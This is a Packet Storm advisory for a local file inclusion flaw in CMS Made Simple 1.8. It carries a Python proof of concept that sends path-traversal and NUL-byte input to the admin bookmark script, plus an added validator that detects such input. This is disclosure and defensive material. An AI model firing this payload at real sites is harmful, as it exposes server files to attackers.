CMS Made Simple 1.8 Local File Inclusion

2010-07-13T00:00:00
ID PACKETSTORM:91717
Type packetstorm
Reporter AutoSec Tools
Modified 2010-07-13T00:00:00

Description

                                        
```python
# ------------------------------------------------------------------------
# Software................CMS Made Simple 1.8
# Vulnerability...........Local File Inclusion
# Download................http://www.cmsmadesimple.org/
# Release Date............7/11/2010
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................John Leitch
# Site....................http://cross-site-scripting.blogspot.com/
# Email...................john.leitch5@gmail.com
# ------------------------------------------------------------------------
#
# --Description--
#
# A local file inclusion vulnerability in CMS Made Simple 1.8 can be
# exploited to include arbitrary files.
#
#
# --PoC--
import httplib, urllib

host = 'localhost'
path = '/cmsms'

lfi = '../' * 32 + 'windows/win.ini\x00'

c = httplib.HTTPConnection(host)
c.request('POST', path + '/admin/addbookmark.php',
          urllib.urlencode({ 'default_cms_lang': lfi }),
          { 'Content-type': 'application/x-www-form-urlencoded' })
r = c.getresponse()

print r.status, r.reason
print r.read()
```
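A defensive check for the parameter the PoC targets, as an added example that is not part of the original advisory or of CMS Made Simple's code: it decodes a form-encoded POST body and rejects `default_cms_lang` values that contain a NUL byte, path traversal characters, or anything that is not a locale name. The locale pattern, the function names and the sample bodies are assumptions constructed for illustration (Python 3).

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Assumption: legitimate language values look like "en_US" or "de";
# adjust the pattern to the locale names your installation ships.
LANG_RE = re.compile(r"[a-z]{2,3}(_[A-Z]{2})?")
PARAM = "default_cms_lang"  # parameter name taken from the PoC above


def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def check_lang(value):
    """Return the reasons a value is rejected; an empty list means accepted."""
    value = fully_decode(value)
    reasons = []
    if "\x00" in value:
        reasons.append("nul-byte")
    if ".." in value or "/" in value or "\\" in value:
        reasons.append("path-traversal")
    if not LANG_RE.fullmatch(value):
        reasons.append("not-a-locale-name")
    return reasons


def inspect_body(body):
    """Check every default_cms_lang value in a form-encoded POST body."""
    findings = []
    for value in parse_qs(body, keep_blank_values=True).get(PARAM, []):
        findings.extend(check_lang(value))
    return findings


# Constructed sample bodies: one benign, one shaped like the PoC, one double-encoded.
SAMPLES = ["default_cms_lang=en_US",
           "default_cms_lang=..%2F..%2Fwindows%2Fwin.ini%00",
           "default_cms_lang=%252e%252e%252fetc"]

if __name__ == "__main__":
    for body in SAMPLES:
        print(body, "->", inspect_body(body) or "ok")
```

The same allowlist applied server-side, before the value reaches any file path, is the mitigation; the log-side check only tells you that someone tried.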